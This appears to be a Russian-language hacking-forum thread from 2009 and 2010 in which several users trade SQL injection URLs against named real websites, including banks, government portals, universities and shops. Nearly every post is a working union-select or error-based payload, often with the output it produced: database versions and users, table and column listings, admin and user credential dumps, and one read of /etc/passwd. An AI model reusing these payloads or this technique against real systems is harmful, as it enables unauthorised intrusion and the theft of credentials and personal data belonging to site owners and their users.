http://www.training-market.com/product.php?id_product=-160+union+select+1,2,3,4,5,6,7,8+--+
http://www.toccataclassics.com/reviews.php?ID=-12+union+select+1,concat_ws(0x3a3a,ID,LoginName,Si tePassword),3,4,5,6+from+loginpassword+--+
http://tformers.com/reviews.php?id=-693+union+select+1,2,concat_ws(0x3a3a,name,uname,e mail,pass),4,5,6,7,8,9,10,11,12+from+nuke_users+li mit+1,1+/*+&op=showcontent
http://www.astronomyforbeginners.com/reviews/reviews.php?id=-46+union+select+1,2,3,4,5,6,7,8+--+
http://www.ausanthrop.net/resources/reviews.php?id=-7+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16+/*+
http://www.greenbazaar.be/categories.php?id_cat=208+union+select+1,concat_ws (0x3a3a,id_administrator,login,password,status)+fr om+administrator+--+
http://www.ekoeki.be/categories.php?id_cat=208+union+select+1,concat_ws (0x3a3a,id_administrator,login,password,status)+fr om+administrator+--+
http://www.info-soft.ro/reviews.php?id_review=-67'+union+select+1,concat_Ws(0x3a3a,username,passw ord),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+f rom+admin+limit+0,1+--+
http://www.muzikreviews.com/reviews.php?ID=-748'+union+select+1,2,concat_ws(0x3a3a,ID,UserName ,Password,NeedPasswordChange,LastLogin,FailedLogin s,AuthGroupID),4,5,6,7,8+from+auth_users+--+
http://www.demoshop.li/index.php?catid=316+uNiOn+sElEct+1,2,unhex(hex(dat abase())),4,5,6+/*+
http://www.womenarts.org/network/reviews.php?id=-3057'+union+select+1,username,password,4+from+user s+limit+0,1+--+
http://www.lpfiction.com/favorites.php?id=-3849+union+select+concat_ws(0x3a3a,username,passwo rd)+from+users+where+id=1171+--+
http://fullmoonparty-thailand.net/bboard/show.php?id=-1+union+select+1,2,3,4,5,concat_ws%280x2a,password %29,7,8,9,10+from+fmpnet_faq.faq_admin--
http://www.paidselling.com/product_desc.php?id=-19999999999+union+select+1,2,version%28%29,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35--
Twin $park
28.12.2009, 22:36
http://www.cne.gov.ve/int_divulgacion_resultados/index_principal.php?e=79&m=2&p=1+and+1=cast((select+version())||chr(32)||user+a s+int)
PostgreSQL 8.1.13 on i686-pc-linux-gnu, compiled by GCC gcc (GCC) 3.4.1 (Mandrakelinux 10.1 3.4.1-4mdk) consultar_web
GinTonic
29.12.2009, 00:01
http://www.suntenglobal.com/news/show.php?ID=112+and+1=0+union+select+1,2,version() ,4,5,6--
version - 4.1.20-log
database - suntenglobal
user - hook@localhost
nemaniak
29.12.2009, 19:01
lanstore.at
http://www.lanstore.at/index.php?module=4&site=rental&cat=2+union+select+concat_ws%280x3a,version%28%29, user%28%29,database%28%29%29,22222,33333,444444+li mit+1,1+--+
5.0.84-log:puresystems@srv1.cyberservice.net:puresystems0 01
GinTonic
30.12.2009, 05:12
http://www.glassdecor.ru/articles/show.php?id=11+and+1=0+union+select+1,concat_ws(0x 3a,version(),user(),database())--
5.0.67:glassdecorru@78.108.81.71:glassdecorru_db
http://www.connecta-pr.ru/conf/index.php?id=-165+union+select+1,concat_ws(0x3a,version(),user() ,database()),3,4,5,6,7,8,9,10,11--
5.1.28-rc:conpr_site@localhost:conpr_site
http://maxidom.md/page.php?page=8001&id=-19+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),dat abase(),user(),@@version_compile_os),5,6--
Database Version: 4.1.22
Database name: maxidom
User name: maxidom@localhost
Os: portbld-freebsd6.2
http://www.pdl.com.ky/preview.php?id=8+UNION+SELECT+1,2,3,concat_ws%280x 3a,version%28%29,database%28%29,user%28%29,@@versi on_compile_os%29,5,6,7,8,9,10,11,12,13,14+LIMIT+1, 1--+
Database Version: 5.0.22
Database name: bicadmin_pdl
User name: pdl_data@localhost
Os: redhat-linux-gnu
http://www.freelancefuture.com/showcv.php?cv=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a ,version(),database(),user(),@@version_compile_os, user,password)+from+mysql.user+LIMIT+2,10--
Database Version: 5.0.27
Database name: econsult
User name: admin@localhost
Os: redhat-linux-gnu
JEEMA Article Collection 1.x JOOMLA
http://www.dedalusjmmr.net/aulas.html?view=longview&catid=null/*%20*/union/**/select/**/aes_decrypt(aes_encrypt(concat(username,0x3a,passw ord),0x71),0x71),2/**/from/**/jos_users
Strilo4ka
31.12.2009, 01:00
http://www.zverevcenter.ru/inc.php?inc=-96+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,ver sion(),user(),database()),10--+
5.0.87-log:zverevcenter@localhost:zverevcenter
ТИЦ: 10
PR: 1
http://www.pornotune.ru/list.php?p2=7%20union%20select%20version%28%29%20--
Version = 5.0.84-percona-highperf-b18-log
User = a25727_1@94.103.90.60
Database = a25727_1
http://www.kutkin.ru/pechi.php?id=2-1+UNION+SELECT+1,CONCAT_WS%280x3a,Version%28%29,Da tabase%28%29,User%28%29%29+LIMIT+1,1--+
Database Version: 5.0.85-community
Database name: ipdenis_kutkin
User name: ipdenis_admin@localhost
OS: pc-linux-gnu
http://www.pnlteleorman.ro/stiri.php?id=2+and+1=2+union+all+select+1,group_co ncat(username,0x3a,password),4,5,6+from+auth_users--
Strilo4ka
01.01.2010, 07:26
новогодний подарочек:)
кавычки не екранируються!!!
http://www.kcbs.us/results_print.php?id=-1899+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a ,user(),version(),database(),@@version_compile_os) ,11,12--+
mma@localhost:5.0.27:kcbs_mma:redhat-linux-gnu
DB:
information_schema:kcbs_db:kcbs_mma
kcbs_db:
AreaOfInterest:Calendar:ClassInstructor:Competitio nTeam:ContestEvent:ContestRep:Event:EventContact:E ventTypes:FamilyMember:Location:MemberInterest:Mem bership:Organization:Person:Unit
kcbs_mma:
AreaOfInterest:Calendar:ClassInstructor:Competitio nTeam:ContestEvent:ContestRep:Event:EventContact:E ventTypes:FamilyMember:Location:MemberInterest:Mem berSignups:Membership:Organization:Person:Unit:adm ins:categories:cbj:classes:eventDirectors:eventRes ults:greatamerican:linkcats:links:market_backyard: market_bbq:market_category:market_rate:market_veri fy:member_survey:news:photos:recipes:reps:rssNews: signups:states:teamoftheyear:teams:topten:totyteam s:tourEvents:toy_dev:toyteams_dev:users:webmembers
admins:
id:nameuser:wordpass
users:
userId:email:password
webmembers:
id:memberId:personId:nameuser:wordpass:lastLogin:e mail:firstname:lastname:city:state:country
person:
Name:PersonId:Phone:AltPhone:Fax:Email:Address:Cit y:State:Zip:Birthdate:Address2:FirstName:LastName
organization:
OrganizationID:OrganizationName:OrgAbbreviation:Ci ty:Address:State:Zip:Phone:Fax:InvoiceNumber:Membe rshipFee:FamilyMembershipFee:ForeignMembershipFee: ForeignFamilyMembershipFee:RunningMemNumber:Organi zationID:OrganizationName:OrgAbbreviation:City:Add ress:State:Zip:Phone:Fax:InvoiceNumber:MembershipF ee:FamilyMembershipFee:ForeignMembershipFee
3360 пользователей!
http://www.kcbs.us/results_print.php?id=-1899+union+select+1,2,3,4,5,6,7,8,9,CONCAT_ws(0x3a ,nameuser,wordpass,email,lastLogin),11,12+from+web members+limit+3360,10000--+
1690 пользователей!
http://www.kcbs.us/results_print.php?id=-1899+union+select+1,2,3,4,5,6,7,8,9,CONCAT_ws(0x3a ,email,password),11,12+from+users+limit+1690,10000--+
админ
http://www.kcbs.us/results_print.php?id=-1899+union+select+1,2,3,4,5,6,7,8,9,CONCAT_ws(0x3a ,nameuser,wordpass),11,12+from+admins--+
#2
http://www.urbanstrategies.us/events/event.php?id=-6+UNION+select+1,2,concat_ws(0x3a,user(),version() ,database(),@@version_compile_os),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19--+
usdbadmin@localhost:4.0.27-log:us_webdata:pc-linux-gnu
#3
http://www.campisis.us/locdetail.php?id=-2+union+select+1,concat_ws(0x3a,user(),version(),d atabase(),@@version_compile_os),3,4,5,6,7,8,9,10,1 1,12--+
campisis@72.167.131.114:4.1.22-max-log:campisis:unknown-linux-gnu
#4
http://www.megger.com/us/products/ProductDetails.php?ID=-643+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x 3a,user(),version(),database(),@@version_compile_o s),12,13,14,15,16,17--+
jbiddle@localhost:5.1.30-community:products:Win64
#5
http://www.globalwaterchallenge.org/about-us/board.php?id=-18+union+select+1,2,3,4,5,concat_ws(0x3a,user(),ve rsion(),database(),@@version_compile_os)%20%20,7,8 ,9,10,11,12--+
globalwater@localhost:5.0.58:globalwater_site:redh at-linux-gnu
http://www.maps4heroes.com/heroes3/rating.php?id=101'+and+1=0+union+select+1,concat_w s(0x3a,user(),version(),database(),@@version_compi le_os),3+--+
srv11356_heroes@c5-w.ht-systems.ru,5.0.45-Max-log,srv11356_heroes,unknown-linux-gnu
mailbrush
01.01.2010, 20:44
http://it.bakinity.biz/smart.php?cat=-2+union+select+1,concat_ws(0x3a,user(),database(), version()),3&id=114
orik@zvm7.host.ru:orik:4.0.27-log
PS:
http://www.monterra.ro/index.php?module=vanzare&tip=3&id=50+and+0+union+select+1,2,concat_ws(0x3a,versio n(),database(),user(),@@version_compile_os),4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,4 1,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57
5.0.22
monterra
root@localhost
redhat-linux-gnu
http://www.monterra.ro/index.php?module=vanzare&tip=3&id=50+and+0+union+select+1,2,id,4,5,email,password ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 ,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57+f rom+users
http://forum.antichat.ru/showpost.php?p=1755084
Юзай антибоян!
http://mailbrush.eu/antiboyan
Unihorizontes.br pr5
Faculdade Novos Horizontes.
http://www.unihorizontes.br/main.php?id=-73'+union+select+null,null,null,null,null,concat_w s(char(32,124,32),version(),user(),database(),@@ve rsion_compile_os),null,null,null,null+--+5.0.51a | nhadmin@192.168.20.87 | test | suse-linux-gnu
Юзай антибоян!
http://mailbrush.eu/antiboyan
лучший антибоян гугл
http://www.c-o-b.co.uk/page.php?ID=10+union+select+1,2,3,4,group_concat(0 x0b,column_name),6+from+information_schema.columns +where+table_name=0x7573657273
users::userID,name,email,password,cdate
http://www.c-o-b.co.uk/page.php?ID=10+union+select+1,2,3,4,group_concat(0 x0b,userID,0x3a,name,0x3a,email,0x3a,password),6+f rom+users
MySQL 5.0.85-community
http://www.c-o-b.co.uk/admin
http://www.rukodelie.ru/index.php?page=cart&lastid=1+union+select+1,2,concat_ws%280x3a,user%28 %29,version%28%29,database%28%29,@@version_compile _os%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36, 37,38,39,40,41,42,43,44
@localhost | 5.0.26-lk-log | rukodelier | pc-linux-gnu
http://www.un.org/sg/articleFullsearch.asp?TID=1%20or%201=%28select%20d b_name%28%29%29--
Имя базы данных : News
http://www.un.org/sg/articleFullsearch.asp?TID=1%20or%201=%28select%20s ystem_user%29--
Владелец : web
http://www.un.org/sg/articleFullsearch.asp?TID=1%20or%201=@@version--
Версия : Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
Теперь таблицы и колонки
http://www.un.org/sg/articleFullsearch.asp?TID=1%20or%201=%28SELECT%20T OP%201%20TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TA BLES%29--
Одна из таблиц: failedemails
Stalingrad
03.01.2010, 17:19
http://www.arctic-cooling.com/webshop/index.php?shop_id=11+union+select+1,2,null--
http://www.arctic-cooling.com/catalog/product_info.php?cPath=41_45+and+1=1--
http://www.arctic-cooling.com/catalog/product_info.php?cPath=41_44&mID=26544+group+by+19--
version(): 4.0.27-standard
user(): dbo273434928@localhost
database(): db273434928
Также есть таблица admin (+админка http://www.arctic-cooling.com/admin)
Strilo4ka
03.01.2010, 19:51
http://shans.com.ua/index.php?m=nr&id=-6421+union+select+1,2,concat_ws(0x3a,version(),dat abase(),user(),@@version_compile_os)--+&in=60
5.0.81-log:shansco_shans:shansco_igor@second.hosted.in:un known-linux-gnu
БД
nformation_schema@shansco_forum@shansco_shans
таблцы
documents@news@news_copy@numbers@pages@poll_commen t@poll_config@poll_data@poll_index@poll_ip@poll_lo g@poll_templates@poll_templateset@poll_user@rec_ba nners@rec_compact@rec_compact_tmp@rec_date@rec_fir m@rec_firm_block@rec_firm_name@rec_firm_tmp@rec_pr ivate@rec_private_tmp@rec_rubric@rubrics@sav_que
таблицы форума
phpbb_attach_quota@phpbb_attachments@phpbb_attachm ents_config@phpbb_attachments_desc@phpbb_auth_acce ss@phpbb_banlist@phpbb_categories@phpbb_config@php bb_confirm@phpbb_disallow@phpbb_extension_groups@p hpbb_extensions@phpbb_forbidden_extensions@phpbb_f orum_prune@phpbb_forums@phpbb_groups@phpbb_posts@p hpbb_posts_text@phpbb_privmsgs@phpbb_privmsgs_text @phpbb_quota_limits@phpbb_ranks@phpbb_search_resul ts@phpbb_search_wordlist@phpbb_search_wordmatch@ph pbb_sessions@phpbb_sessions_keys@phpbb_smilies@php bb_themes@phpbb_themes_name@phpbb_topics@phpbb_top ics_watch@phpbb_user_group@phpbb_users@phpbb_vote_ desc@phpbb_vote_results@phpbb_vote_voters@phpbb_wo rds
poll_user:
user_id@username@userpass@session@last_visit
poll_log
log_id@poll_id@option_id@timestamp@ip_addr@host@ag ent
http://shans.com.ua/index.php?m=nr&id=-6421+union+select+1,2,group_concat(concat_ws(0x3a, username,userpass,last_visit)%20separator%200x3a)+ from+poll_user--+&in=60
админка и форум соответсвенно в каталогах:
admin/
forum/
http://www.karlson-e.ru/?page=product&dir=-1%27+and+1=1+union+select+1,2,3,4,5,6,concat_ws%28 0x3a,version%28%29,database%28%29,user%28%29,@@ver sion_compile_os%29,8,9+--+
webuser@localhost
5.1.34-log
karlson
portbld-freebsd7.1
Мускул 4й
http://www.digitalflywheel.com/case.php?id=-4+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user name,0x3a,password)+from+users+limit+1,1
MySQL 4.0.27-log
users::username,password
http://www.digitalflywheel.com/admin
shell_c0de
04.01.2010, 13:42
Bank ))
http://www.fidelitybank.com.gh/management/details.php?id=-1+union+select+1,2,3,4,5,6,7--
Database:
Version : 4.1.22-standard-log
User: 335104_alfred@172.16.10.112
OS: pc-linux-gnu
Strilo4ka
04.01.2010, 17:10
идея shell_c0de Bank ))
http://concern-stellar.com/stella-bank/index.php?id=27&ssf=-193+union+select+1,2,concat_ws(0x40,user(),databas e(),version()),4--+
concerns_stella@localhost@concerns_bank@4.1.22-standard-log
http://www.akcia-bank.ru/index.php?id=-27+union+select+1,2,3,4,5,concat_ws(0x40,user(),da tabase(),version(),@@version_compile_os),7--+
akciaban_bank@localhost@akciaban_bank@5.0.81-community@unknown-linux-gnu
http://sparhafen.ch/index.php?id=180488&VERANSTALTUNG_id=-197820+union+select+concat_ws(0x3a,user(),version( ),database(),@@version_compile_os)--+
Event: bank_sparhafen@localhost:5.0.37-community-nt:bank_sparhafen:Win32
другие
65 колонок
http://infores.mpt.gov.by/ir/database/view_ir.php?id=-4241+union+select+1,2,3,4,concat_ws(0x3a,user(),da tabase(),version(),@@version_compile_os),6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43 ,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,6 0,61,62,63,64,65--+
inforesipps@localhost:inforesipps:4.1.25-log:portbld-freebsd6.3
http://www.ak-cent.kz/news?news_category=-1+union+select+1,2,3,4,5,6,7
akcentk_user@localhost
5.0.77-community
akcentk_cms
unknown-linux-gnu
http://delemont.com.au/description.php?intProductID=71%27+and+substring%2 8@@version,1,1%29=%274
http://www.moretonisland.com.au/product.php?id=67768+union+select+1,2,@@version,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30--
Strilo4ka
04.01.2010, 19:34
класичечкий вариант блокировался1!!
http://www.fiat.md/events/poln.php?id=20+or(1,2)=(select+count(*),concat(use r(),0x3a,database(),0x3a,version(),0x3a,@@version_ compile_os,floor(rand(0)*2))from(information_schem a.tables)+group+by+2)
8055@localhost:8055:5.0.77:redhat-linux-gnu1
http://smarthome.atto.ru/index.php?page=news&act=view&id=378+union+select+1,2,concat_ws(0x3a,user(),data base(),version(),@@version_compile_os),4,5--+
atto@localhost:atto_new:4.1.22-logortbld-freebsd6.2
cremator (c)
04.01.2010, 19:46
http://helpstudentam.ru/index.php?action=referats&cours=99+union+select+version()
Database Version: 5.0.81-community
Database name: murzifan_helpstudents
User name: murzifan_murzifa@localhost
http://www.mgounb.ru/?content=20'&folder=-1'+union+select+version()/*
Database Version: 4.0.15-nt
Database name: mgounb
User name: root@localhost
http://www.kuroed.com/?id=-1+and+1=1+union+select+1,2,concat_ws(0x3a,user(),d atabase(),version(),@@version_compile_os),4,5,6,7, 8,9,10,11,12,13,14,15+--+
kuroed@localhost
kuroed1db
4.1.22-log
portbld-freebsd6.3
:o
MySQL 5:
www.johnsoncitypress.com
http://www.johnsoncitypress.com/News/article.php?ID=71327'+and+1=2+union+select+1,2,3,4 ,5,6,7,concat_ws(0x3b,user_name,user_password),9,1 0,11,12,13,14,15,16,17,18,19,20,21+from+ClinchFest Store.wp_users+limit+0,1+--+
www.sewe.com
http://www.sewe.com/gallery.php?id=9+and+1=2+union+select+1,2,3,4,5,6, 7,group_concat%28column_name%29,9,10,11,12+from+in formation_schema.columns+where+table_name=0x757365 7273+--+
www.365gunspor.com
http://www.365gunspor.com/unluler/picture.php?id=34%29+and+1=2+union+select+1,2,grou p_concat%28concat_ws%280x3a,userbane,password%29%2 9+from+sporadmin+--+
www.faithwriters.com
http://www.faithwriters.com/wc-article-editors-previous.php?id=31730%27+and+7=9+union+select+1,2, 3,4,5,group_concat%28concat_ws%280x3a,username,pas sword%29%29,7,8,9,10+from+adminpass+--+
www.talkofnewyork.com
http://www.talkofnewyork.com/cool2us/cool.php?ID=396+and+1=2+union+select+1,2,3,concat_ ws%280x3a,id,username,password%29,5,6,7,8+from+adm in+limit+0,1+--+
www.hoylegaming.com
http://www.hoylegaming.com/game.php?id=18+and+2=1+union+select+1,group_concat %28concat_ws%280x3a,username,password%29%29,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,77,88,99,20,21,22,23, 24+from+admin_users+--+
soccerladuma.mobi
http://soccerladuma.mobi/news.php?id=21263+and+1=2+union+select+1,2,group_c oncat%28concat_ws%280x3a,fullname,email,passw,stat us%29%29,4,5,6,7,8+from+admin--
www.open.ac.uk
http://www.open.ac.uk/picetl/news/details/detail.php?itemId=496ddbbb661f5%27+and+1=2+union+s elect+1,2,3,4,5,6,concat_ws%28CHAR%2858,58%29,%20u sername,%20password%29,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26+from+SecurityCmsUser+l imit+0,1/*
www.rockfreaks.net
http://www.rockfreaks.net/index.php?page=albumreviews&id=-2398+union+select+1,table_schema,3,4,5,6,7,8,9,10+ from+information_schema.columns+where+table_name=C HAR%2898,95,117,115,101,114,115%29
www.rmmedia.ru
http://www.rmmedia.ru/news.php?id=48+and+1=2+union+select+1,group_concat %28concat_ws%280x3a,username,password%29%29,3,4,5+ from+admin_audioshare.administrators--
www.yourlistonline.com
http://www.yourlistonline.com/news.php?id=29%27+and+1=2+union+select+1,2,3,group _concat%28concat_ws%280x3a,userName,password%29%29 ,5,6+from+a_users+--+
www.milim.com
http://www.milim.com/news.php?id=100+and+1=2+union+select+1,2,3,4,5,6,g roup_concat%28concat_ws%280x3a,column_name%29%29,8 +from+information_schema.columns+where+table_name= 0x62625f7573657273+--+
www.cloudveil.com
http://www.cloudveil.com/company/news.php?id=50+and+1=11+union+select+1,2,3,4,5,6,7 ,group_concat(table_name),9,10,11,12,13+from+infor mation_schema.tables+--+
www.darksidefreefly.com
http://www.darksidefreefly.com/news.php?id=3+and+1=2+union+select+1,2,3,4,5,group _concat%28table_name%29+from+information_schema.ta bles--
www.activeodds.info
http://www.activeodds.info/news.php?id=5445+and+1=2+union+select+1,2,group_co ncat%28table_name%29,4,5+from+information_schema.t ables--
www.mikealstottfamilyfoundation.org
http://www.mikealstottfamilyfoundation.org/news.php?id=19%27+and+1=2+union+select+1,2,3,group _concat%28table_name%29,5,6,7,8+from+information_s chema.tables+--+
MySQL 4:
www.cssdownunder.com
http://www.cssdownunder.com/site.php?id=345+and+1=2+union+select+1,concat_ws(0 x3a,version(),user(),database()),3,4,5,6,7,8,9,10+--+
epodsolar.com
http://epodsolar.com/site.php?id=340+and+1=2+union+select+1,concat_ws%2 80x3a,version%28%29,user%28%29,database%28%29%29,3 ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29+--+
shell_c0de
06.01.2010, 03:33
Продолжаем традицию банков )
крупный Америкосовский банк
http://www.mcsbnh.com/about/news.php?id=-61+UNION+SELECT+1,concat_ws(0x3a,version(),databas e(),user(),@@version_compile_os),3,4,5--
User: mcsbnhc_ensky@localhost
Version: 4.1.22-standard
Database: mcsbnhc_mcsb
OS: linux-gnu
http://www.lamsade.dauphine.fr/members.php?id_person=-151+union+select+1,version(),3,4,5,6,7,8,9,10,11,1 2,13,14,15--
http://www.budd-marseille.fr/news.php?ID=-13+union+select+1,concat_ws(0x3a,user(),database() ,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24/*
http://www.avem.fr/news.php?id=-0148+union+select+1,2,3,4,concat_ws(0x3a,version() ,database(),user()),6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27
4.0.25-standard-log:avemlfod:avemlfod@10.0.70.21
http://www.akata.fr/news.php?id=-449+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8,9
4.0.26-standard-log:akatav2:akatav2@10.0.62.107
http://www.lephotographe.fr/news/news.php?id=-232+union+select+1,2,3,concat_ws(0x3a,user(),datab ase(),version()),5,6,7,8,9,10,11,12,13--
lephotographe@tictac.priv:lephotographe:4.1.22-log
dr.Pilulkin
07.01.2010, 16:59
torreabbey@localhost:5.0.45:torreabbey
http://www.torre-abbey.org.uk/news.php?nID=-21+union+select+1,2,concat_ws(0x3a,user(),version( ),database()),4--
db_dentuser@lxplesk223:5.0.45:dentistry_content
http://www.dentistry.co.uk/news/news_detail.php?id=2434+limit+0+UnIon(SelecT+1,coN caT_wS(0x3a,uSer(),VerSion(),daTaBase()),3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26)+--+
nanoorg_news@localhost:5.0.83-log:nanoorg_news
http://www.nano.org.uk/news/index.php?article=-319+union+select+1,2,concat_ws(0x3a,user(),version (),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20--
council@localhost:4.1.8-nt-max-log:dev_cms
http://www.thurrock.gov.uk/news/content.php?page=story'+limit+0+union+select+1,2,3 ,binary(concat_ws(0x3a,user(),version(),database() )),5,6,7,8,9,10,11,12,13,14,15,16,17,18/*&ID=3530
DezMond™
08.01.2010, 13:57
http://thehamsterwheel.net
http://thehamsterwheel.net/game-reviews.php?id=-33'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+
http://www.theatrealive.com.au
http://www.theatrealive.com.au/reviews.php?id=-476+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x 3a3a,email,firstname,lastname,pwd,user_level),12,1 3,14,user(),16,17,18,19,20,21,22,23,24+from+users+ where+user_level=1+limit+2,1+/*+
http://tformers.com
http://tformers.com/article.php?sid=-12873+union+select+1,2,3,concat_ws(0x3a3a,aid,name ,email,pwd,radminsuper,user()),5,6,7,8,9,10,11,12+ from+nuke_authors+where+radminsuper=1+limit+1,1+--+
www.gamesnewsi.com
http://www.gamesnewsi.com/reviews.php?op=showcontent&id=-751+union+select+1,2,3,concat_ws(0x3a3a,aid,name,e mail,pwd,radminsuper),5,6,7,8,9,10,11,12+from+nuke _authors+where+radminsuper=1+limit+5,1+--+
www.arscars.com
http://www.arscars.com/reviews.php?id=-6'+union+select+1,2,3,4,5,6,7,8,9,10,11,group_conc at(table_name)+from+information_schema.tables+--+
www.americandreamcomics.com
http://www.americandreamcomics.com/reviews.php?op=showcontent&id=-1105+union+select+1,2,3,concat_ws(0x3a3a,aid,name, email,pwd,radminsuper),5,6,7,8,9,10,11,12+from+nuk e_authors+where+radminsuper=1+limit+0,1+--+
www.clubfandango.co.uk
http://www.clubfandango.co.uk/reviews.php?id=-2198+union+select+1,2,3,column_name,5,6,7,8+from+i nformation_schema.columns+where+table_name=0x77705 F7573657273+--+
beerdorks.com
http://beerdorks.com/reviews.php?rev_id=-484+union+select+1,2,concat_ws(0x3a3a,user_login,u ser_password),4,5,6,7,8,9,10,11,12,13+from+users+--+
www.hollies.co.uk
http://www.hollies.co.uk/review/reviewindex.php?menu=-2009+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20+--+&st=1
benua.com.ua
http://benua.com.ua/reviews.php?id=-11+union+select+1,2,concat_ws(0x3a3a,login,pass,st atus),4+from+clients+--+
www.e-stat.info
http://www.e-stat.info/?cat=-16'+union+select+1,2,3,4,group_concat(table_name), 6,7,8,9+from+information_schema.tables+group+by+ta ble_schema+--+
www.beelingua.com
http://www.beelingua.com/reviews.php?id=-1+union+select+1,concat_ws(0x3a3a,id,l_user,l_pass ),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+l_ admin+--+
www.best-savings-rates.com
http://www.best-savings-rates.com/reviews.php?id=-4+union+select+1,2,3,4,5,6,7,concat_ws(0x3a3a,user name,password),9,10,11,12+from+users+--+
www.winesellersltd.com
http://www.winesellersltd.com/reviews.php?id=-10+union+select+concat_ws(0x3a3a,user_name,passwor d),2,3,4,5+from+users+limit+2,10+--+
www.the-junkyard.net
http://the-junkyard.net/reviews.php?action=viewreview&id=-32'+union+select+1,concat_ws(0x3a3a,username,passw ord),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21+from+users+limit+0,1+--+
www.surclaro.com
http://www.surclaro.com/reviews.php?op=showcontent&id=-7+union+select+1,2,3,4,5,6,7,8,9,10,11+/*+
www.hardwareheaven.com
http://www.hardwareheaven.com/reviews.php?reviewid=588&pageid=-1'+UnioN+SElect+1+from+authors+--+
www.metalfan.nl
http://www.metalfan.nl/reviews.php?id=-5491+union+select+1,concat_ws(0x3a3a,user_id,usern ame,user_password,user_level)+from+mf_users+where+ user_level=5+/*+
MySQL 5.0.87-community-log
http://pravoinvest.com.ua/firm.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,group_concat(0x0b,column_nam e),24+from+information_schema.columns+where+table_ name=0x7573657273+--
users::user_id,user_login,user_password,user_descr iption,user_level
http://pravoinvest.com.ua/firm.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,group_concat(0x0b,user_id,0x 3a,user_login,0x3a,user_password),24+from+users+--
http://pravoinvest.com.ua:2082/login/
spherics
08.01.2010, 17:26
Всем прив давно мну не было.Писали нет по стате хл но все равно осмелюсь.
Двиг HLstatsX Community Edition 1.6.5
http://hlstatsx.eu/hlstats.php?mode=dailyawardinfo&award=-99+union+select+1,2,concat_ws(0x3a,version(), user(),database()),4--&game=css
Version: 5.0.45-log
User: root@92.48.227.131
Database: hlstatsce
Читаем : etc/passwd
http://hlstatsx.eu/hlstats.php?mode=dailyawardinfo&award=-99+union+select+1,2,CONCAT(0x3a,LOAD_FILE(0x2F6574 632F706173737764), 0x3a),4--&game=css
с мускула root
http://hlstatsx.eu/hlstats.php?mode=dailyawardinfo&award=-99+union+select+1,2,concat_ws(0x3a,user,password), 4+from+mysql.user--&game=css
Если что извиняйте.
Mysql 4.
http://www.n5md.com/download.php?catno=99999+union+select+1,version(), 3,4,5,6,7,8,9,0,1,2,3,4,5,6,7/*
http://www.a4flash.com/showcase2/index.php?category=21+and+1=2+uNiON+aLl+sElEcT+1,2 ,3,group_concat(version(),0x3a,database(),0x3a,use r()),5,6,7,8,9,10,11--
- 5.0.87-community:a4flash_web:a4flash_rw@localhost
.:[melkiy]:.
09.01.2010, 17:23
http://www.kzplus.ru/index.php?ch=articles&id=-3523+union+select+1,2,3,4,concat_ws%280x3a,version %28%29,user%28%29,database%28%29%29,6,7,8,9,10,11, 12,13,14--+
pma: http://kzplus.ru/sql/
есть форум, но таблу не подобрал(
---
http://prodajka.ru/?php=1&module=pages&id=-7+union+select+1,2,concat_ws%280x3a,version%28%29, user%28%29,database%28%29%29,4,5,6,7,8,9,10,11,12, 13+--+
[Feldmarschall]
09.01.2010, 19:20
http://www.edfashionclothes.com/productlist.php?fid=7&cid=36
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
Powered-by: PHP/5.2.11
DB Server: MySQL >=5
-------------------------------------------------------
http://www.edfashionclothes.com/productlist.php?tid=&fid=7&cid=-36%20union%20select%201,2,3,column_name,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19%20from%20information _schema.columns+--+
-
